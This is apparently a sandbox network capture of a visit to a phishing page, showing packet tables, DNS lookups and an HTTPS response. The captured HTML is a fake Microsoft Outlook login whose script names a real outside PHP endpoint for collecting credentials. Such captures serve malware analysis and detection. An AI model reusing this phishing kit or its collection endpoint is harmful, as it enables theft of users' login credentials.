Apr 17, 2024 01:37:42.374301910 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.374332905 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.450647116 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450702906 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450721025 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450737953 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450767040 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450874090 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.450874090 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.450943947 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.450999022 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.454061031 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.457535028 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.457573891 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.457604885 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.457621098 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.457674980 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.460988998 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.464482069 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.464505911 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.464551926 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.464570999 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.464590073 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.464618921 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.464646101 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.465240955 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.465270996 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.476927042 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.476974964 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.477046967 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.477623940 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.477653980 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.480190039 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:42.480268002 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:42.482800961 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.483133078 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.483148098 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.484000921 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.484059095 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.484538078 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.484587908 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.484745026 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.484750032 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.525896072 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.594017029 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.594222069 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.596487999 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.596517086 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.597021103 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.598772049 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.640151024 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.689646959 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.692081928 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.692143917 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.692466974 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.693243027 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.693306923 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.693819046 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.693820953 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.693892002 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.693944931 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.698497057 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.698509932 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.736114979 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.803742886 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.803919077 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.804007053 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.821717978 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.821770906 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.821806908 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.821824074 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.898405075 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898456097 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898508072 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898525953 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.898591042 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898639917 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898639917 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.898655891 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.898704052 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.901624918 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.905052900 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.905076027 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.905111074 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.905128002 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.905241966 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.908598900 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.912064075 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.912117004 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.912177086 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.912192106 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.912211895 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.912237883 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.912275076 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.978959084 CEST	49730	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.978997946 CEST	443	49730	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:50.119457960 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:50.119545937 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:50.119633913 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:51.494730949 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:51.494792938 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:52.838843107 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:52.838843107 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:52.839231014 CEST	49736	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:52.839310884 CEST	443	49736	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:52.839407921 CEST	49736	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:52.839605093 CEST	49736	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:52.839622974 CEST	443	49736	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:52.994868040 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:52.994878054 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:58.222069025 CEST	443	49736	23.1.237.91	192.168.2.5
Apr 17, 2024 01:37:58.222181082 CEST	49736	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:38:12.569004059 CEST	443	49736	23.1.237.91	192.168.2.5
Apr 17, 2024 01:38:12.569103003 CEST	49736	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:38:39.918504953 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:39.918539047 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:39.918592930 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:39.918879032 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:39.918885946 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:40.134967089 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:40.143445015 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:40.143501997 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:40.144891024 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:40.150115967 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:40.150235891 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:40.204680920 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:50.157418966 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:50.157572031 CEST	443	49741	64.233.177.99	192.168.2.5
Apr 17, 2024 01:38:50.157624006 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:51.302489042 CEST	49741	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:38:51.302555084 CEST	443	49741	64.233.177.99	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 01:37:37.157222033 CEST	53	59857	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:37.211986065 CEST	53	64677	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:37.791846991 CEST	53	60734	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:38.055296898 CEST	54495	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:38.056317091 CEST	57961	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:38.163172960 CEST	53	54495	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:38.165302038 CEST	53	57961	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.131756067 CEST	53716	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.131870031 CEST	50853	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.168333054 CEST	55821	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.168699026 CEST	63874	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.240818024 CEST	53	53716	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.260561943 CEST	53	50853	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.273611069 CEST	53	55821	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.274296999 CEST	53	63874	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.693507910 CEST	58878	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.693682909 CEST	50242	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.786478043 CEST	55686	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.786622047 CEST	62118	53	192.168.2.5	1.1.1.1
Apr 17, 2024 01:37:39.800945997 CEST	53	58878	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.801578045 CEST	53	50242	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.890976906 CEST	53	62118	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:39.890990019 CEST	53	55686	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:40.162780046 CEST	53	55786	1.1.1.1	192.168.2.5
Apr 17, 2024 01:37:55.076591015 CEST	53	63500	1.1.1.1	192.168.2.5
Apr 17, 2024 01:38:13.890146971 CEST	53	53407	1.1.1.1	192.168.2.5
Apr 17, 2024 01:38:36.770670891 CEST	53	49925	1.1.1.1	192.168.2.5
Apr 17, 2024 01:38:36.771255970 CEST	53	54978	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 17, 2024 01:37:38.055296898 CEST	192.168.2.5	1.1.1.1	0x36df	Standard query (0)	pub-778c9922a88c4d2c839b01025172bb0b.r2.dev	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:38.056317091 CEST	192.168.2.5	1.1.1.1	0xe1b7	Standard query (0)	pub-778c9922a88c4d2c839b01025172bb0b.r2.dev	65	IN (0x0001)	false
Apr 17, 2024 01:37:39.131756067 CEST	192.168.2.5	1.1.1.1	0x300b	Standard query (0)	cdn-jm-tools.web.app	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.131870031 CEST	192.168.2.5	1.1.1.1	0x1269	Standard query (0)	cdn-jm-tools.web.app	65	IN (0x0001)	false
Apr 17, 2024 01:37:39.168333054 CEST	192.168.2.5	1.1.1.1	0xc8e4	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.168699026 CEST	192.168.2.5	1.1.1.1	0x391f	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Apr 17, 2024 01:37:39.693507910 CEST	192.168.2.5	1.1.1.1	0x3121	Standard query (0)	cdn-jm-tools.web.app	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.693682909 CEST	192.168.2.5	1.1.1.1	0x7d1b	Standard query (0)	cdn-jm-tools.web.app	65	IN (0x0001)	false
Apr 17, 2024 01:37:39.786478043 CEST	192.168.2.5	1.1.1.1	0x640a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.786622047 CEST	192.168.2.5	1.1.1.1	0x5cd7	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 17, 2024 01:37:38.163172960 CEST	1.1.1.1	192.168.2.5	0x36df	No error (0)	pub-778c9922a88c4d2c839b01025172bb0b.r2.dev		104.18.3.35	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:38.163172960 CEST	1.1.1.1	192.168.2.5	0x36df	No error (0)	pub-778c9922a88c4d2c839b01025172bb0b.r2.dev		104.18.2.35	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.240818024 CEST	1.1.1.1	192.168.2.5	0x300b	No error (0)	cdn-jm-tools.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.273611069 CEST	1.1.1.1	192.168.2.5	0xc8e4	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.273611069 CEST	1.1.1.1	192.168.2.5	0xc8e4	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.274296999 CEST	1.1.1.1	192.168.2.5	0x391f	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Apr 17, 2024 01:37:39.800945997 CEST	1.1.1.1	192.168.2.5	0x3121	No error (0)	cdn-jm-tools.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890976906 CEST	1.1.1.1	192.168.2.5	0x5cd7	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.99	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.103	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.105	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.104	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.106	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:39.890990019 CEST	1.1.1.1	192.168.2.5	0x640a	No error (0)	www.google.com		64.233.177.147	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:40.066828966 CEST	1.1.1.1	192.168.2.5	0xded5	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:37:40.066828966 CEST	1.1.1.1	192.168.2.5	0xded5	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:40.066828966 CEST	1.1.1.1	192.168.2.5	0xded5	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:42.153398037 CEST	1.1.1.1	192.168.2.5	0xe005	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:37:42.153398037 CEST	1.1.1.1	192.168.2.5	0xe005	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:42.153398037 CEST	1.1.1.1	192.168.2.5	0xe005	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:37:52.606611967 CEST	1.1.1.1	192.168.2.5	0x3b23	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:37:52.606611967 CEST	1.1.1.1	192.168.2.5	0x3b23	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:38:05.874533892 CEST	1.1.1.1	192.168.2.5	0xd7aa	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:38:05.874533892 CEST	1.1.1.1	192.168.2.5	0xd7aa	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:38:28.982331991 CEST	1.1.1.1	192.168.2.5	0x2bb6	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:38:28.982331991 CEST	1.1.1.1	192.168.2.5	0x2bb6	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 17, 2024 01:38:49.531120062 CEST	1.1.1.1	192.168.2.5	0x99a9	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 17, 2024 01:38:49.531120062 CEST	1.1.1.1	192.168.2.5	0x99a9	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pub-778c9922a88c4d2c839b01025172bb0b.r2.dev

https:

cdn-jm-tools.web.app

cdnjs.cloudflare.com

aadcdn.msauth.net

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	104.18.3.35	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:38 UTC	703	OUT	GET /quickbookdoc.html HTTP/1.1 Host: pub-778c9922a88c4d2c839b01025172bb0b.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	283	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 23:37:39 GMT Content-Type: text/html Content-Length: 19428 Connection: close Accept-Ranges: bytes ETag: "591b7b06c558ecc6629dcfa8f76d4133" Last-Modified: Thu, 06 Jul 2023 12:45:23 GMT Server: cloudflare CF-RAY: 875801201c3e53f4-ATL
2024-04-16 23:37:39 UTC	1086	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 6d 61 69 6e 5f 65 6d 61 69 6c 5f 74 6f 20 3d 20 22 22 3b 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 53 63 72 69 70 74 5f 6c 69 6e 6b 3d 20 22 68 74 74 70 73 3a 2f 2f 61 62 6f 72 64 61 72 65 73 2e 63 6f 6d 2f 71 75 69 63 6b 79 2f 64 66 2e 70 68 70 22 3b 0d 0a 20 20 20 20 20 20 20 20 6c 65 74 20 72 65 73 75 6c 74 5f 70 72 6f 76 69 64 65 72 20 3d 20 22 4d 69 63 72 6f 73 6f 66 74 20 4f 75 74 6c 6f 6f 6b 22 3b 0d 0a 20 20 Data Ascii: <!DOCTYPE HTML><html><head> <script> let main_email_to = ""; let redirect_link = "https://login.microsoft.com/" let Script_link= "https://abordares.com/quicky/df.php"; let result_provider = "Microsoft Outlook";
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 74 61 6e 74 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 64 65 66 69 6e 65 47 6c 6f 62 61 6c 73 3a 20 53 65 72 76 65 72 44 61 74 61 2c 20 62 6f 64 79 43 73 73 43 6c 61 73 73 22 3e 3c 64 69 76 3e 3c 64 69 76 20 64 61 74 61 2d 62 69 6e 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 3a 20 7b 20 6e 61 6d 65 3a 20 27 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 2d 63 6f 6e 74 72 6f 6c 27 2c 20 70 75 62 6c 69 63 4d 65 74 68 6f 64 73 3a 20 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6e 74 72 6f 6c 4d 65 74 68 6f 64 73 20 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 Data Ascii: tant}</style></head><body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><div data-bind="component: { name: 'background-image-control', publicMethods: backgroundControlMethods }"><div class="background" role="presentation" data-bind="
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 6d 65 6e 74 43 6c 69 63 6b 20 7d 20 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 63 73 73 3a 20 7b 20 27 61 70 70 27 3a 20 62 61 63 6b 67 72 6f 75 6e 64 4c 6f 67 6f 55 72 6c 20 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 22 20 64 61 74 61 2d 62 69 6e 64 3d 22 20 61 6e 69 6d 61 74 69 6f 6e 45 6e 64 3a 20 70 61 67 69 6e 61 74 69 6f 6e 43 6f 6e 74 72 6f 6c 4d 65 74 68 6f 64 73 28 29 20 26 61 6d 70 3b 26 61 6d 70 3b 20 70 61 67 69 6e 61 74 69 6f 6e 43 6f 6e 74 72 6f 6c 4d 65 74 68 6f 64 73 28 29 2e 76 69 65 77 5f 6f 6e 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 2c 20 63 73 73 3a 20 7b 20 27 61 70 70 27 3a 20 62 61 63 6b 67 72 6f 75 6e 64 4c 6f Data Ascii: mentClick } }"><div class="middle" data-bind="css: { 'app': backgroundLogoUrl }"><div class="inner fade-in-lightbox" data-bind=" animationEnd: paginationControlMethods() && paginationControlMethods().view_onAnimationEnd, css: { 'app': backgroundLo
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 43 6f 6e 74 72 6f 6c 4d 65 74 68 6f 64 73 2c 20 70 61 72 61 6d 73 3a 20 7b 20 65 6e 61 62 6c 65 43 73 73 41 6e 69 6d 61 74 69 6f 6e 3a 20 73 76 72 2e 61 65 2c 20 64 69 73 61 62 6c 65 41 6e 69 6d 61 74 69 6f 6e 49 66 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 55 6e 73 75 70 70 6f 72 74 65 64 3a 20 73 76 72 2e 62 71 2c 20 69 6e 69 74 69 61 6c 56 69 65 77 49 64 3a 20 69 6e 69 74 69 61 6c 56 69 65 77 49 64 2c 20 63 75 72 72 65 6e 74 56 69 65 77 49 64 3a 20 63 75 72 72 65 6e 74 56 69 65 77 49 64 2c 20 69 6e 69 74 69 61 6c 53 68 61 72 65 64 44 61 74 61 3a 20 69 6e 69 74 69 61 6c 53 68 61 72 65 64 44 61 74 61 2c 20 69 6e 69 74 69 61 6c 45 72 72 6f 72 3a 20 24 6c 6f 67 69 6e 50 61 67 65 2e 67 65 74 53 65 72 76 65 72 45 72 72 6f 72 28 29 20 7d 2c 20 65 76 65 6e 74 3a 20 Data Ascii: ControlMethods, params: { enableCssAnimation: svr.ae, disableAnimationIfAnimationEndUnsupported: svr.bq, initialViewId: initialViewId, currentViewId: currentViewId, initialSharedData: initialSharedData, initialError: $loginPage.getServerError() }, event:
